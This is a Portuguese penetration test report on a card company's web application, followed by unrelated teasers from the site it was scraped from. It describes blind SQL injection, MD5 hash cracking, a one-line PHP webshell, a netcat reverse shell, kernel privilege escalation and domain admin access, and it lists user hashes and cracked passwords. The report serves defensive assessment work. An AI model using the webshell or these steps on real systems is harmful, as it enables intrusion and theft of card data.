Relató rió Teste de Intrusa ó

Tamanho: px
Começar a partir da página:

Download "Relató rió Teste de Intrusa ó"

Transcrição

1 Relató rió Teste de Intrusa ó Cliente: XZYCARD ESTE RELATÓRIO CONTÉM INFORMAÇÃO CONFIDENCIAL E NÃO DEVE SER ENVIADO POR ,FAX OU QUALQUER OUTRO MEIO ELETRÔNICO A MENOS QUE ESTE SEJA PREVIAMENTE APROVADO PELAS POLITICAS DE SEGURANÇA DA CONTRATANTE. 5/11/2014

2 Controle de Versões DATA VERSÃO AUTOR ALTERAÇÕES 05/11/ Ricardo Longatto - VERSÃO INICIAL; VERSÃO FINAL;

3 2 05 de Novembro de 2014 Att. Sr. José dos Santos Segurança da Informação XYZCARD Considerações iniciais Através deste presente relatório apresentamos o Relatório de Teste de Intrusão segundo o escopo definido pela proposta aprovada pelas partes envolvidas nesta análise. José Ricardo Longatto

4 3 2 - Introdução e objetivo A DESEC SECURITY foi contratada para conduzir um PENETRATION TEST contra sistema web da XYZCARD. A avaliação foi conduzida de maneira a simular um ataque malicioso com objetivo de determinar o impacto que falhas de segurança podem ter no que diz respeito à integridade, disponibilidade e confidencialidade do negócio Escopo De acordo com o combinado e acordado entre as partes, o TESTE DE INTRUSÃO escolhido foi do tipo BLACKBOX (Sem conhecimento de informações), ou seja, a única informação oferecida pela CONTRATANTE foi uma URL. URL A CONTRATANTE deu liberdade para que o teste inicie a partir da URL e tem conhecimento que a CONTRATADA tem permissão de acessar seus ativos (servidores e serviços) internos desde que o ataque tenha sido iniciado através da URL principal. O objetivo deste TESTE DE INTRUSÃO do tipo BLACKBOX é conduzir uma simulação de ataque malicioso da maneira que seja possível determinar o impacto que as falhas de segurança possam apresentar na: Na Integridade dos sistemas da companhia Na confidencialidade das informações de clientes Na infraestrutura interna e disponibilidade dos sistemas e serviços O resultado dessa avaliação deve ser usado para mitigação dessas falhas a fim de minimizar os riscos e melhorar a segurança.

5 Limitações de Escopo As limitações impostas pela CONTRATANTE foram: Ataques DoS e DDoS (Negação de Serviço) (visto que outra empresa presta suporte a disponibilidade de seus sistemas) Ataques de Engenharia Social (pois objetivo principal da contratante é medir o nível de segurança de seu ambiente sem depender do fator de erro humano) Responsabilidades O trabalho desenvolvido pela DESEC SECURITY não tem como objetivo corrigir as possíveis vulnerabilidades, nem proteger a CONTRATANTE contra ataques internos e externos, nosso objetivo é fazer um levantamento dos riscos e recomendar formas para minimiza-los. As recomendações sugeridas neste relatório devem ser testadas e validadas pela equipe técnica da empresa CONTRATANTE antes de serem implantadas em ambiente em produção. A DESEC SECURITY não se responsabiliza pela implantação e possíveis impactos que possam vir a ocorrer em outras aplicações ou serviços Metodologia A metodologia utilizada neste teste visa analisar os níveis de proteção implantados, iniciando sem nenhuma informação disponibilizada pela empresa. Passando pelas fases de obtenção de informações, reconhecimento, identificação de IPs, sistemas operacionais, enumeração de serviços e utilizando uma metodologia de pentesting para cada fase em especifico, somente após esse reconhecimento se inicia a fase de detecção de vulnerabilidades e posteriormente a exploração e pós-exploração e validação do risco.

6 Sumário executivo Os resultados das avaliações efetuadas na aplicação a partir da internet da empresa XYZ CARD, demonstram que a empresa possui sérios riscos de segurança no qual a presença de vulnerabilidades graves comprometem o sigilo de informações sensíveis e a imagem da empresa XYZCARD Resumo das ameaças Através de uma falha aplicação web foi possível explorar o banco de dados, conseguir credenciais, acessar o servidor, e conseguir acesso administrativo ao banco de dados critico Classificação do risco Nível Baixo Médio Descrição Acesso a informações não relevantes. Acesso a informações relevantes que podem ajudar na descoberta e exploração de vulnerabilidades graves. Alto Acesso não autorizado a informações sensíveis, que possam causar prejuízo financeiro e denegrir a imagem da empresa. RECOMENDAÇÕES As recomendações para mitigação do problema estarão dessa forma

7 Resumo das Vulnerabilidades A tabela abaixo é um resumo das vulnerabilidades encontradas, mostrando seu impacto no negócio e recomendação para mitigação, pode-se seguir para referencia indicada para ver detalhes. Ref. Vulnerabilidade Nível de Risco 4.8 Identificação de Médio servidores e serviços 4.2 Hash de senhas passiveis a descoberta 4.4 Programas padrões habilitados no web server, wget, netcat,gcc 4.5 Kernel desatualizado Médio Médio Médio Impacto Determinar versões, sistema operacional e serviços rodando podem ajudar na exploração de falhas conhecidas. O uso de hash não garante a segurança das senhas se as senhas não forem complexas. Programas como wget, netcat, gcc são a alegria de um hacker, pois ajudam na pósexploração e escalação de privilégios. Usar versão de kernel desatualizada pode impactar em graves falhas de segurança Recomendações Suprimir mensagens de banners dos serviços, ou altera-las para serviços diferentes a fim de confundir possíveis ataques. O ideal é que as senhas possuam um nível mínimo de complexidade, exigindo senhas com caracteres especiais, números e maiúsculas e minúsculas. Devem-se remover programas que não são usados, fazendo harderning do servidor, e removendo programas com permissões suid. Deve-se atentar a atualizar sempre que necessário e aplicar patch de correção nas versões de kernel em uso, muitas versões já possuem exploits públicos que comprometem a segurança.

8 7 Ref. Vulnerabilidade Nível de Risco 4.1 Sql injection via Alto method post (cadastro/check.php) onde se faz a checagem do CPF. 4.3 Edição de pag php através do painel administrativo 4.6 Mysql local sem senha de root 4.7 Contas com altos privilégios usados para vários serviços Alto Alto Alto Impacto Através desta falha é possível manipular o banco de dados e conseguir acesso informações não autorizadas. Permitir edição em código php pode ser usado para escrever código malicioso a fim de ganhar acesso ao servidor. Usar mysql mesmo localmente( ) sem senha de root é gravíssimo, permitindo acesso completo a informações sensíveis. Uso da mesma senha para vários serviços, e contas com privilégios administrativos podem levar a acesso a dados não autorizados. Recomendações Devem-se tratar os dados de entrada antes de envia-los para o banco, evitando que uma consulta possa interferir diretamente com o banco. Devem-se evitar permitir edição de código php através do painel administrativo, deve se bloquear o uso de system, eval etc no php. Nunca se deve usar mysql sem senha de root, mesmo se o servidor rodar em localhost, pois como mostramos é possível acessar serviços internos através da web. Nunca se devem permitir contas com privilégios altos, em vários serviços ou com senhas triviais, devese existir uma politica de senha para cada serviço não permitindo usar a mesma senha em outros serviços.

9 Resultado do Trabalho - Analise Técnica SQL INJECTION via método POST A aplicação web foi criada em PHP e usava banco de dados MYSQL, todas as requisições GET estavam tratadas o que não apresentava riscos, porem na pagina de cadastro quando usuário digitava CPF a aplicação fazia um POST para checar se o CPF já existia no banco de dados, isso se tornou um vetor de entrada no qual ao interceptar com um proxy (Burp) e alterar o valor era possível explorar uma falha de BLIND SQL INJECTION, que nos permitiu fazer um DUMP completo de todo o banco de dados da aplicação, com isso foi possível enumerar os usuários, as senhas estavam criptografadas com hash MD5 porem foram facilmente decifradas através de RAIBOW TABLES. Burp Suite interceptando requisição POST de checagem de CPF Através da exploração da falha de SQL INJECTION (Blind) foi possível acessar o seguinte banco de dados. Dbsite blog cat_videos cidades depoimentos destaque downloads

10 9 estados fotos administrativo galeria imgblog newsletter noticias pais parceiros convenio usuários videos lojas Usuários e seus respectivos hashs MD5 Tabelas de Usuários Login Hash MD5 admin a7c31920a9f0203fb40b cd0 renato 6c42a0e82972c13a34887cb3d0dd0493 douglas 88b19a95dc8d85f5fcac677682dfc5e2 julia a05c24627a79b9a823cda4828e72e474 jbeto fc13c3093df5ddaf31b89b6dca56b7ac maristela c63a057a7d2b69d80a02f52bd2d21839 jorge 3f28f5e735ffbbcadd49acfbc8044a9a *A ferramenta escolhida para fazer a exploração do sql injeciton foi sqlmap. RECOMENDAÇÃO PARA FALHA SQL INJECTION Tratar os dados antes de envia-los via POST, evitando assim uma possível manipulação do banco, uma camada a mais além da correção do código seria o uso de um WAF Web Application Firewall que faz bloqueios de ataques web. NÍVEL ALTO

11 Descoberta de hash de senha MD5 Uso de site raimbow tables de hash md5 para descriptar senhas md5 Usuários com senhas descobertas admin xyzcard renato maristela saopaulo RECOMENDAÇÃO PARA HASH DE SENHAS Deve se existir uma boa politica na geração das senhas, forçando o usuário a criar uma senha com caracteres especiais, alfanuméricos e pelo menos uma letra maiúscula, isso dificulta bastante uma descoberta de senhas. NÍVEL MÉDIO Acesso painel administrativo e criação de arquivo.php malicioso Em poder do usuário e senha foi possível logar no painel administrativo da aplicação onde com usuário admin era possível gerenciar a aplicação e através da função de gerenciamento das paginas do site foi possível escrever uma webshell simples em php para conseguir rodar comandos no servidor, no qual foi possível via netcat fazer uma conexão reversa e conseguir uma shell com privilégios mínimos e posteriormente acesso ao ssh com shell interativo. Usuario admin tem permissão para gerenciar site, usando opção de edição de código foi possível escrever uma webshell em php e conseguir command execution (executar comando SO) na aplicação. <?php system($_get[ pwn ]);?> Webshell simples em php que permite executar comandos do sistema operacional.

12 11 Com isso ao acessar r. Retorna-nos (versão do kernel) 4.4 Programas padrões no servidor Abrimos uma conexão reversa IP 9999 e /bin/bash Com isso foi possível acessar a shell reversa, e listarmos serviços rodando internamente, como podemos ver mysql só é acessível localmente ( ) Até então tínhamos apenas uma shell que não era interativa, não daria para se conectar ao mysql, e não tínhamos usuários validos para ssh, então criamos um par de chaves ssh parar forçarmos um acesso ssh. Assim podemos logar no ssh usando chave privada

13 Kernel Desatualizado e Vulnerável O servidor Linux da aplicação utilizava a versão de kernel no qual foi possível ganhar privilégios de root explorando a falha CVE , com acesso root foi possível logar no MYSQL e ver outros bancos de dados de outras aplicações como, por exemplo, o de convênios de cartões, onde era possível criar cartões com limite, deletar registros. Essa versão de kernel possui uma vulnerabilidade CVE no qual permite fazer escalação de privilégios Usando exploit publico Conseguimos root e ter acesso completo ao sistema. RECOMENDAÇÃO EDIÇÃO DE PHP NA PAGINA DE ADMIN Não se deve permitir edição de arquivos php dentro da pagina de admin a menos que seja extremamente necessário, mesmo assim deve-se bloquear comandos como system, eval do php para evitar códigos malicioso. NÍVEL ALTO

14 13 RECOMENDAÇÃO PROGRAMAS PADROES NO SERVIDOR Recomendamos fazer um harderning no servidor removendo programas como netcat, gcc, wget e permissões suidbit, assim aumentando o nível de segurança e a dificuldade em conseguir comprometer a segurança. NÍVEL MÉDIO RECOMENDAÇÃO KERNEL DESATUALIZADO A versão de Kernel rodando no servidor estava desatualizada além de possuir exploit publico para explora-la, deve-se sempre aplicar patch de correções e atualizações sempre que necessário. NÍVEL MÉDIO 4.6 MYSQL sem senha de root Agora com acesso direto ao MYSQL foi possível acessar outros bancos de dados de outras aplicações que antes não tínhamos acesso. dbprivcard priv_cc priv_num priv_clients priv_lojas Tabela cc _ccid _num _name _limit _venc _data Uma vez com acesso direto a estas informações, é possível criar registros, alterar, modificar limites, criar cartões ilimitados, causando dano direto a empresa. MYSQL SEM SENHA DE ROOT Mysql deve possuir senha de root mesmo estando rodando em localhost pois como podemos ver foi possível acessar o banco e comprometer os dados através da internet. NÍVEL ALTO

15 Acesso ao Webmail Corporativo As senhas obtidas na aplicação foram testadas com dos funcionários e 2 delas tiveram sucesso o que possibilitou ter acesso ao corporativo da empresa. Contas validas para webmail Conta Senha saopaulo Contas com privilégios altos rodando em vários serviços Deve se existir uma boa politica de senhas, onde não é permitido usar a mesma senha para vários serviços, usar contas com poucos privilégios, politica de responsabilidade do usuário com a senha, pois como vimos foi possível acessar webmail corporativo e servidor de domínio. NÍVEL ALTO Também foi possível encontrar um servidor Windows Server 2008 que funcionava como controlador de domínio e terminal service, foi possível fazer login no servidor com 2 contas de usuários, 1 com poucos privilégios e 1 com privilégios de domain admin, o qual foi possível acessar todos compartilhamentos, criar usuários, acessar aplicações internas, instalar sniffer e keylogger para conseguir mais credenciais da rede.

16 Descoberta de Servidores e Serviços Na fase de reconhecimento do alvo criamos um programa simples que fazia brute force em subdomínios da url no qual foi possível identificar servidor Windows server 2008 rodando terminal service. Servidores IP ts.xyzcard.com.br webmail.xyzcard.com.br O software usado foi dnsrato https://github.com/ricardolongatto/dnsrato Contas validas para Terminal Service Usuario Senha Tipo de Conta renato Domain Admin maristela saopaulo Domain User Logon Windows Server 2008 R2 com usuário renato

17 16 Usuario renato logado DESCOBERTA DE SERVIDORES E SERVIÇOS INTERNOS Deve se suprimir os banner de serviços ou altera-los a fim de enganar possíveis atacantes, no caso do brute force de subdomínio isso poderia ser resolvido se fosse utilizado um nome menos comum para o ts do Windows server. NÍVEL MÉDIO

18 17 Conclusão A DESEC SECURITY conclui este trabalho com objetivo atingido no qual foi possível identificar problemas de segurança e recomendar suas possíveis mitigações. Após a CONTRATANTE aplicar todas as correções sugeridas a DESEC SECURITY irá concluir a versão final deste relatório afim de comprovar se todas falhas encontradas neste relatório foram mitigadas com sucesso. Desde já agradecemos a oportunidade em oferecermos nossos serviços profissionais e estamos a sua disposição para qualquer dúvida que considerem pertinentes. Corpo Técnico Ricardo Longatto Desec Security Analista de Segurança da Informação (19)

19 18 Anexo I Acordo de Confidencialidade A CONTRATANTE (XYZCARD) e a CONTRATADA (DESEC SECURITY) acordam entre si: 1. A CONTRATANTE entrega a CONTRATADA informação de sua propriedade relativos às configurações de segurança de seus dispositivos informáticos sujeitos ao objeto da atividade contratada (Teste de Intrusão). 2. A informação entregue pela CONTRATANTE à CONTRATADA e vice versa, relacionado ao objeto ou mesmo produto da atividade contratada se constitui Informação Confidencial. 3. A CONTRATADA se obriga a: a. Manter em caráter sigiloso a Informação Confidencial e não disponibilizá-la a terceiros sem o consentimento da CONTRATANTE. b. Utilizar a Informação Confidencial exclusivamente para a atividade contratada e tarefas definidas no escopo deste trabalho. c. Restituir toda a Informação Confidencial toda vez que esta for solicitada pela CONTRATANTE. d. Destruir toda Informação Confidencial com solicitação e consentimento da CONTRATANTE, a qual a CONTRATADA deverá provar tal destruição. e. Revelar a Informação Confidencial somente às pessoas cujo conhecimento é indispensável para atender a finalidade da atividade contratada. Estas pessoas devem manter as obrigações aqui previstas e a CONTRATADA responderá somente a elas. f. Eliminar toda cópia eletrônica e/ou impressa da Informação Confidencial de qualquer equipamento informático ou outros equipamentos de apoio, salvo autorização expressa da CONTRATANTE, uma vez que o trabalho seja finalizado. 4. A CONTRATADA está liberada de sua obrigação em guardar segredo da Informação Confidencial caso: a. As evidências fornecidas pela CONTRANTE, sejam de prévio conhecimento da CONTRATADA em período anterior à atividade contratada. b. As informações sejam publicamente conhecidas sem que resultem no descumprimento da CONTRATADA ou de um terceiro sujeito a uma obrigação de confidencialidade. c. Exista uma obrigação jurídica de fornecimento da informação. Neste caso a CONTRATADA, poderá revelar somente o mínimo de Informação Confidencial necessário para o cumprimento da exigência legal. Neste caso, a informação apenas será fornecida depois da notificação formal a ambas as partes. Este direito também poderá ser exercido pela CONTRATADA no dia do vencimento do prazo para provimento desta informação, descrito no requerimento jurídico. 5. A CONTRATADA está ciente que: a. A CONTRATANTE, não outorga nenhuma garantia a respeito da Informação Confidencial, salvo que este conteúdo é de sua propriedade e tem todo direito em revelá-la. b. A Informação Confidencial pode conter erros, ser inexata, não ser aplicável ou não se destinar à questão da atividade contratada. c. A CONTRATADA é exclusivamente responsável pela atualização da Informação Confidencial, o uso que ela outorgue e os efeitos que esta atualização resulte. d. A Informação Confidencial tem um valor estratégico para a CONTRATANTE. 6. A CONTRATANTE está ciente que: a. Os documentos entregues (impressos ou eletrônicos) serão de acesso exclusivo aos responsáveis pela empresa contratante e/ou área contratante.

Planejando uma política de segurança da informação

Planejando uma política de segurança da informação Planejando uma política de segurança da informação Para que se possa planejar uma política de segurança da informação em uma empresa é necessário levantar os Riscos, as Ameaças e as Vulnerabilidades de

Leia mais

Segurança da Informação

Segurança da Informação Segurança da Informação Segurança e Vulnerabilidades em Aplicações Web jobona@terra.com.br Definição: Segurança Segundo o dicionário da Wikipédia, o termo segurança significa: 1. Condição ou estado de

Leia mais

Curso Pentest Profissional

Curso Pentest Profissional Ementa Oficial do Curso Pentest Profissional Capítulo 01 Introdução Mercado de Segurança da Informação (Pentest) Preparação Entender o cliente Definir o escopo e limitações Janela de testes Contato Responsabilidades

Leia mais

Boas Práticas de Desenvolvimento Seguro

Boas Práticas de Desenvolvimento Seguro Boas Práticas de Desenvolvimento Seguro Julho / 2.012 Histórico de Revisões Data Versão Descrição Autor 29/07/2012 1.0 Versão inicial Ricardo Kiyoshi Página 2 de 11 Conteúdo 1. SEGURANÇA DA INFORMAÇÃO

Leia mais

Ementa Completa. Introdução

Ementa Completa. Introdução Ementa Completa Introdução Mercado de Segurança da Informação (Pentest) Preparação Entender o cliente Definir o escopo e limitações Janela de testes Contato Responsabilidades Autorização Non-Disclosure

Leia mais

Manual de Instalação ( Client / Server ) Versão 1.0

Manual de Instalação ( Client / Server ) Versão 1.0 1 pág. PROCEDIMENTO DE INSTALAÇÃO DO SGCOM ATENÇÃO: É OBRIGATÓRIO UMA CONEXÃO COM A INTERNET PARA EXECUTAR A INSTALAÇÃO DO SGCOM. Após o Download do instalador do SGCOM versão Server e Client no site www.sgcom.inf.br

Leia mais

SCIM 1.0. Guia Rápido. Instalando, Parametrizando e Utilizando o Sistema de Controle Interno Municipal. Introdução

SCIM 1.0. Guia Rápido. Instalando, Parametrizando e Utilizando o Sistema de Controle Interno Municipal. Introdução SCIM 1.0 Guia Rápido Instalando, Parametrizando e Utilizando o Sistema de Controle Interno Municipal Introdução Nesta Edição O sistema de Controle Interno administra o questionário que será usado no chek-list

Leia mais

Ameaças e Contramedidas de Host

Ameaças e Contramedidas de Host Prof. Hederson Velasco Ramos Prof. Henrique Jesus Quintino de Oliveira quintino@umc.br Fonte: http://www.antispam.br/ Monitoramento (PortScan) Exemplos de monitoramento são varreduras de porta, varredura

Leia mais

Sistemas para Internet 06 Ataques na Internet

Sistemas para Internet 06 Ataques na Internet Sistemas para Internet 06 Ataques na Internet Uma visão geral dos ataques listados na Cartilha de Segurança para Internet do CGI Comitê Gestor da Internet Componente Curricular: Bases da Internet Professor:

Leia mais

SOLUÇÕES AMBIENTE SEGURO SEUS NEGÓCIOS DEPENDEM DISSO!

SOLUÇÕES AMBIENTE SEGURO SEUS NEGÓCIOS DEPENDEM DISSO! SOLUÇÕES AMBIENTE SEGURO SEUS NEGÓCIOS DEPENDEM DISSO! O ambiente de Tecnologia da Informação (TI) vem se tornando cada vez mais complexo, qualquer alteração ou configuração incorreta pode torná-lo vulnerável

Leia mais

O projeto Metasploit é um framework que foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos

O projeto Metasploit é um framework que foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos O projeto Metasploit é um framework que foi criado em 2003 por HD Moore e é uma plataforma que permite a verificação do estado da segurança dos computadores existentes numa determinada rede, permitindo

Leia mais

Proteção no Ciberespaço da Rede UFBA. CPD - Divisão de Suporte Yuri Alexandro yuri.alexandro@ufba.br

Proteção no Ciberespaço da Rede UFBA. CPD - Divisão de Suporte Yuri Alexandro yuri.alexandro@ufba.br Proteção no Ciberespaço da Rede UFBA CPD - Divisão de Suporte Yuri Alexandro yuri.alexandro@ufba.br Agenda Segurança o que é? Informação o que é? E Segurança da Informação? Segurança da Informação na UFBA

Leia mais

Compartilhamento de recursos de forma a racionar e otimizar o uso de equipamentos e softwares. Servidores e Workstations. Segurança é um desafio, por

Compartilhamento de recursos de forma a racionar e otimizar o uso de equipamentos e softwares. Servidores e Workstations. Segurança é um desafio, por $XWDUTXLD(GXFDFLRQDOGR9DOHGR6mR)UDQFLVFR± $(96) )DFXOGDGHGH&LrQFLDV6RFLDLVH$SOLFDGDVGH3HWUROLQD± )$&$3( &XUVRGH&LrQFLDVGD&RPSXWDomR $8',725,$'$7(&12/2*,$'$,1)250$d 2 &\QDUD&DUYDOKR F\QDUDFDUYDOKR#\DKRRFRPEU

Leia mais

Segurança no Linux. Guilherme Pontes. Pós-graduação em Segurança de Redes com Linux. lgapontes@gmail.com www.guilhermepontes.eti.

Segurança no Linux. Guilherme Pontes. Pós-graduação em Segurança de Redes com Linux. lgapontes@gmail.com www.guilhermepontes.eti. Segurança no Linux Guilherme Pontes lgapontes@gmail.com www.guilhermepontes.eti.br Pós-graduação em Segurança de Redes com Linux Rede Local As redes de computadores nem sempre tiveram dimensão mundial.

Leia mais

FACSENAC. SISGEP SISTEMA GERENCIADOR PEDAGÓGICO DRP (Documento de Requisitos do Projeto de Rede)

FACSENAC. SISGEP SISTEMA GERENCIADOR PEDAGÓGICO DRP (Documento de Requisitos do Projeto de Rede) FACSENAC SISTEMA GERENCIADOR PEDAGÓGICO Versão: 1.2 Data: 25/11/2011 Identificador do documento: Documento de Visão V. 1.7 Histórico de revisões Versão Data Descrição Autor 1.0 03/10/2011 Primeira Edição

Leia mais

1 SQL Injection A consulta normal SQL seria:

1 SQL Injection A consulta normal SQL seria: HTTP Testando aplicação Web. Pegaremos dois tipos de ataques dentre os top 10 do OWASP 1 SQL Injection A consulta normal SQL seria: SELECT * FROM Users WHERE Username='$username' AND Password='$password'

Leia mais

Segurança na Web. André Tavares da Silva. andre.silva@udesc.br

Segurança na Web. André Tavares da Silva. andre.silva@udesc.br Segurança na Web André Tavares da Silva andre.silva@udesc.br Propósito da Segurança A segurança não é usada simplesmente para proteger contra ataques diretos mas é essencial para estabelecer credibilidade/confiança

Leia mais

Artigo 1º - Aprovar revisão da Política de Segurança da PRODEB, que com esta se publica.

Artigo 1º - Aprovar revisão da Política de Segurança da PRODEB, que com esta se publica. Classificação: RESOLUÇÃO Código: RP.2007.077 Data de Emissão: 01/08/2007 O DIRETOR PRESIDENTE da Companhia de Processamento de Dados do Estado da Bahia - PRODEB, no uso de suas atribuições e considerando

Leia mais

FACULDADES INTEGRADAS PROMOVE DE BRASÍLIA PROJETO DE INICIAÇÃO CIENTÍFICA

FACULDADES INTEGRADAS PROMOVE DE BRASÍLIA PROJETO DE INICIAÇÃO CIENTÍFICA FACULDADES INTEGRADAS PROMOVE DE BRASÍLIA PROJETO DE INICIAÇÃO CIENTÍFICA SOLUÇÃO SISTÊMICA BASEADA EM CÓDIGO ABERTO PARA DEFESA E MITIGAÇÃO DE ATAQUES À APLICAÇÕES WEB. DANIEL ALMEIDA DE PAULA BRASÍLIA

Leia mais

Soluções em Segurança

Soluções em Segurança Desafios das empresas no que se refere a segurança da infraestrutura de TI Dificuldade de entender os riscos aos quais a empresa está exposta na internet Risco de problemas gerados por ameaças externas

Leia mais

O Que Fazer Se Houver Comprometimento Programa de Segurança da Informação da Conta (AIS) Fevereiro de 2006

O Que Fazer Se Houver Comprometimento Programa de Segurança da Informação da Conta (AIS) Fevereiro de 2006 Programa de Segurança da Informação da Conta (AIS) Fevereiro de 2006 Região Introdução...3 Reportando a Quebra de Segurança...4 Passos e Exigências para as Entidades Comprometidas...5 Passos e Exigências

Leia mais

Proposta de pentest. O pentest realizado vai desde ataques aos servidores até testes na programação das aplicações com tentativas reais de invasão;

Proposta de pentest. O pentest realizado vai desde ataques aos servidores até testes na programação das aplicações com tentativas reais de invasão; initsec Proposta de pentest 1. O que é? Pentest (Penetration Test) é uma avaliação de maneira realista da segurança empregada em aplicações web e infraestruturas de TI no geral. O Pentest constitui da

Leia mais

Sobre Nós. NossaVisão

Sobre Nós. NossaVisão 2015 Sobre Nós 1 ArtsSec foi fundada por um grupo de profissionais dedicados à segurança da informação a fim de proporcionar soluções criativas e de alto valor aos seus clientes. A empresa surgiu em 2012,

Leia mais

Serviços Ibama Certificação Digital

Serviços Ibama Certificação Digital Guia da nos 1. Informações Gerais Objetivando garantir mais segurança ao acesso dos usuários dos Serviços do Ibama, foi estabelecido desde o dia 1º de janeiro de 2014, o acesso por meio de certificação

Leia mais

Segurança em computadores e em redes de computadores

Segurança em computadores e em redes de computadores Segurança em computadores e em redes de computadores Uma introdução IC.UNICAMP Matheus Mota matheus@lis.ic.unicamp.br @matheusmota Computador/rede segura Confiável Integro Disponível Não vulnerável 2 Porque

Leia mais

Payment Card Industry (PCI)

Payment Card Industry (PCI) Payment Card Industry (PCI) Indústria de Cartões de Pagamento (PCI) Padrão de Segurança de Dados Procedimentos para o Scanning de Segurança Version 1.1 Portuguese Distribuição: Setembro de 2006 Índice

Leia mais

AISE - Administração Integrada de Sistemas Elotech. MANUAL AISE RECURSOS HUMANOS: Módulo Portal RH Web

AISE - Administração Integrada de Sistemas Elotech. MANUAL AISE RECURSOS HUMANOS: Módulo Portal RH Web AISE - Administração Integrada de Sistemas Elotech. MANUAL AISE RECURSOS HUMANOS: Módulo Portal RH Web Maringá - Paraná Outubro / 2014 AISE - Administração Integrada de Sistemas Elotech. MANUAL AISE RECURSOS

Leia mais

Políticas de Segurança de Sistemas

Políticas de Segurança de Sistemas Políticas de Segurança de Sistemas Profs. Hederson Velasco Ramos Henrique Jesus Quintino de Oliveira Estudo de Boletins de Segurança O que é um boletim de segurança? São notificações emitidas pelos fabricantes

Leia mais

Joomla - Possibilidades infinitas em CMS.

Joomla - Possibilidades infinitas em CMS. Joomla - Possibilidades infinitas em CMS. Felipe Perin AUV surveyor Consultor de Segurança em TI Desenvolvedor web Entusiasta em software livre Segurança em Redes de Computadores Redator do Pub & Comunic.

Leia mais

Norma de Segurança Estadual para Gerenciamento de Senhas

Norma de Segurança Estadual para Gerenciamento de Senhas GOVERNO DO ESTADO DE MATO GROSSO SECRETARIA DE ESTADO DE PLANEJAMENTO E COORDENAÇÃO GERAL CONSELHO SUPERIOR DO SISTEMA ESTADUAL DE INFORMAÇÃO E TECNOLOGIA DA INFORMAÇÃO ANEXO I - RESOLUÇÃO Nº. 011/2011

Leia mais

Proteger as informações da empresa para a qual trabalhamos é um dever de todos nós!

Proteger as informações da empresa para a qual trabalhamos é um dever de todos nós! Prezado Colaborador, O conteúdo desta cartilha tem como objetivo compartilhar alguns conceitos relacionados ao tema Segurança da Informação. Além de dicas de como tratar os recursos e as informações corporativas

Leia mais

Desenvolvimento e disponibilização de Conteúdos para a Internet

Desenvolvimento e disponibilização de Conteúdos para a Internet Desenvolvimento e disponibilização de Conteúdos para a Internet Por Matheus Orion OWASP A Open Web Application Security Project (OWASP) é uma entidade sem fins lucrativos e de reconhecimento internacional,

Leia mais

Desenvolvimento e disponibilização de Conteúdos para a Internet

Desenvolvimento e disponibilização de Conteúdos para a Internet Desenvolvimento e disponibilização de Conteúdos para a Internet Por Matheus Orion Principais tecnologias front-end HTML CSS JAVASCRIPT AJAX JQUERY FLASH JAVA APPLET Linguagens que executam no cliente HTML

Leia mais

NORMA DE SEGURANÇA PARA A UNIFAPNET

NORMA DE SEGURANÇA PARA A UNIFAPNET NORMA DE SEGURANÇA PARA A UNIFAPNET 1. Objetivo As Normas de Segurança para a UNIFAPnet têm o objetivo de fornecer um conjunto de Regras e Recomendações aos administradores de rede e usuários, visando

Leia mais

Certificado Digital e-cpf

Certificado Digital e-cpf Certificado Digital e-cpf Parabéns! Ao ter em mãos esse manual, significa que você adquiriu um certificado digital AC Link. Manual do Usuário 1 Índice Apresentação... 03 O que é um Certificado Digital?...

Leia mais

Certificado Digital e-cpf

Certificado Digital e-cpf Página1 Certificado Digital e-cpf Manual do Usuário Página2 Índice Apresentação... 03 O que é um Certificado Digital?... 03 Instalando o Certificado... 04 Conteúdo do Certificado... 07 Utilização, guarda

Leia mais

Segurança na Rede Local Redes de Computadores

Segurança na Rede Local Redes de Computadores Ciência da Computação Segurança na Rede Local Redes de Computadores Disciplina de Desenvolvimento de Sotware para Web Professor: Danilo Vido Leonardo Siqueira 20130474 São Paulo 2011 Sumário 1.Introdução...3

Leia mais

SSE 3.0 Guia Rápido Parametrizando o SISTEMA DE SECRETARIA Nesta Edição Configurando a Conexão com o Banco de Dados

SSE 3.0 Guia Rápido Parametrizando o SISTEMA DE SECRETARIA Nesta Edição Configurando a Conexão com o Banco de Dados SSE 3.0 Guia Rápido Parametrizando o SISTEMA DE SECRETARIA Nesta Edição 1 Configurando a Conexão com o Banco de Dados 2 Primeiro Acesso ao Sistema Manutenção de Usuários 3 Parametrizando o Sistema Configura

Leia mais

Objetivos deste capítulo

Objetivos deste capítulo 1 Objetivos deste capítulo Identificar a finalidade de uma política de segurança. Identificar os componentes de uma política de segurança de rede. Identificar como implementar uma política de segurança

Leia mais

Privacidade.

Privacidade. <Nome> <Instituição> <e-mail> Privacidade Agenda Privacidade Riscos principais Cuidados a serem tomados Créditos Privacidade (1/3) Sua privacidade pode ser exposta na Internet: independentemente da sua

Leia mais

Manual de Atualização Versão 3.6.4.

Manual de Atualização Versão 3.6.4. Manual de Atualização Versão 3.6.4. Sumário 1. AVISO... 1 2. INTRODUÇÃO... 2 3. PREPARAÇÃO PARA ATUALIZAÇÃO... 3 4. ATUALIZANDO GVCOLLEGE E BASE DE DADOS... 7 5. HABILITANDO NOVAS VERSÕES DO SISTEMA....

Leia mais

Manual de instalação, configuração e utilização do Assinador Betha

Manual de instalação, configuração e utilização do Assinador Betha Manual de instalação, configuração e utilização do Assinador Betha Versão 1.5 Histórico de revisões Revisão Data Descrição da alteração 1.0 18/09/2015 Criação deste manual 1.1 22/09/2015 Incluído novas

Leia mais

Guia de Prática. Windows 7 Ubuntu 12.04

Guia de Prática. Windows 7 Ubuntu 12.04 Guia de Prática Windows 7 Ubuntu 12.04 Virtual Box e suas interfaces de rede Temos 04 interfaces de rede Cada interface pode operar nos modos: NÃO CONECTADO, que representa o cabo de rede desconectado.

Leia mais

Serviço de Hospedagem de Sites. Regras de Uso: Serviço de Hospedagem de Sites

Serviço de Hospedagem de Sites. Regras de Uso: Serviço de Hospedagem de Sites Serviço de Hospedagem de Sites Regras de Uso: Serviço de Hospedagem de Sites Dados Gerais Identificação do documento: Regras de Uso - Serviço de Hospedagem de Sites - V1.0 Projeto: Regras de Uso: Serviço

Leia mais

Normas para o Administrador do serviço de e-mail

Normas para o Administrador do serviço de e-mail Normas para o Administrador do serviço de e-mail Os serviços de e-mails oferecidos pela USP - Universidade de São Paulo - impõem responsabilidades e obrigações a seus Administradores, com o objetivo de

Leia mais

Instalação do software e de opções da Série Polycom RealPresence Group e acessórios. Visão geral

